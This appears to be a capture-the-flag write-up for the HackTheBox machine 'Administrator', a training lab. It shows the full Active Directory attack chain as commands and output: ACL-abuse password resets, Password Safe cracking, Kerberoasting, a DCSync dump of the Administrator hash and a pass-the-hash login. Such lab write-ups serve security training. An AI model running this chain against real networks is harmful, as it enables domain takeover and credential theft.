Home Lab Setup Case 1 Case 2 Case 3 HackTheBox Vulnhub Offsec Proving Grounds

Administrator (HTB – Medium)

This machine provides an initial user credential (Olivia) and requires several Active Directory techniques: enumeration, password resets through ACL abuse, FTP access, password‑safe cracking, Kerberoasting, and finally a DCSync attack to obtain the Administrator hash.

Overview

Target: 10.10.11.42
Initial access: Olivia (provided by HTB)
Domain: administrator.htb
Goal: escalate through multiple users until DCSync is possible.

Enumeration

Initial credential:

Olivia : ichliebedich

Enumerating users:

$ enum4linux-ng -u Olivia -p 'ichliebedich' 10.10.11.42
Users found: olivia, michael, benjamin, emily, ethan, alexander, emma, administrator

LDAP enumeration:

$ nxc ldap 10.10.11.42 -u users.txt -p 'ichliebedich' --users

WinRM check:

$ nxc winrm 10.10.11.42 -u olivia -p 'ichliebedich' -X 'ipconfig'
-> Works

BloodHound collection:

$ nxc ldap 10.10.11.42 -u olivia -p 'ichliebedich' --bloodhound --collection ALL --dns-server 10.10.11.42
-> Output saved to bloodhound.zip

BloodHound was used to inspect privilege relations between users.

Foothold

$ evil-winrm -i 10.10.11.42 -u olivia -p 'ichliebedich'

Nothing useful in Olivia’s profile. BloodHound shows that Olivia can reset Michael’s password.

Privilege Escalation Path

1. Olivia → Michael

PS> Set-ADAccountPassword -Identity "Michael" -NewPassword (ConvertTo-SecureString "NewPassword123!" -AsPlainText -Force)

2. Michael → Benjamin

PS> Set-ADAccountPassword -Identity "Benjamin" -NewPassword (ConvertTo-SecureString "NewPassword123!" -AsPlainText -Force)

3. Benjamin → FTP Access

Benjamin can authenticate to FTP using the new password.

$ ftp 10.10.11.42
User: benjamin
Pass: NewPassword123!
Files:
Backup.psafe3

Password Safe Cracking

Crack the Password Safe file:

$ pwsafe2john Backup.psafe3 > Backup.psafe3.john
$ john Backup.psafe3.john -w=/usr/share/wordlists/rockyou.txt
-> tekieromucho

Open the file to retrieve stored credentials: 

emily : UXLCI5iETUsIBoFVTj8yQFKoHjXmb

Emily Access

$ evil-winrm -i 10.10.11.42 -u emily -p 'UXLCI5iETUsIBoFVTj8yQFKoHjXmb'
-> user.txt

BloodHound shows Emily has GenericWrite over Ethan. This allows Kerberoasting or SPN manipulation.

Kerberoasting Ethan

Clock skew fix (if needed):

# as root
$ ntpdate 10.10.11.42

Request SPN ticket:

$ impacket-GetUserSPNs administrator.htb/emily:UXLCI5iETUsIBoFVTj8yQFKoHjXmb -dc-ip 10.10.11.42 -request
-> Hash saved

Crack the hash:

$ hashcat -a 0 -m 13100 kerberoast-hash.txt -O /usr/share/wordlists/rockyou.txt -o cracked.txt
-> ethan : limpbizkit

Ethan Access

$ nxc smb 10.10.11.42 -u ethan -p 'limpbizkit'
-> Valid credentials

BloodHound shows Ethan has DCSync privileges.

DCSync Attack

$ impacket-secretsdump 'administrator.htb'/'ethan':'limpbizkit'@10.10.11.42

Administrator:500:aad3b435b51404eeaad3b435b51404ee:3dc553ce4b9fd20bd016e098d2d2fd2e:::

Administrator Access

$ evil-winrm -i 10.10.11.42 -u Administrator -H '3dc553ce4b9fd20bd016e098d2d2fd2e'
-> root.txt

Conclusion

The machine chains several AD privilege abuses: password resets through ACL misconfigurations, credential extraction from a Password Safe file, Kerberoasting, and finally DCSync. The final compromise is achieved by abusing Ethan’s replication privileges to obtain the Administrator NT hash.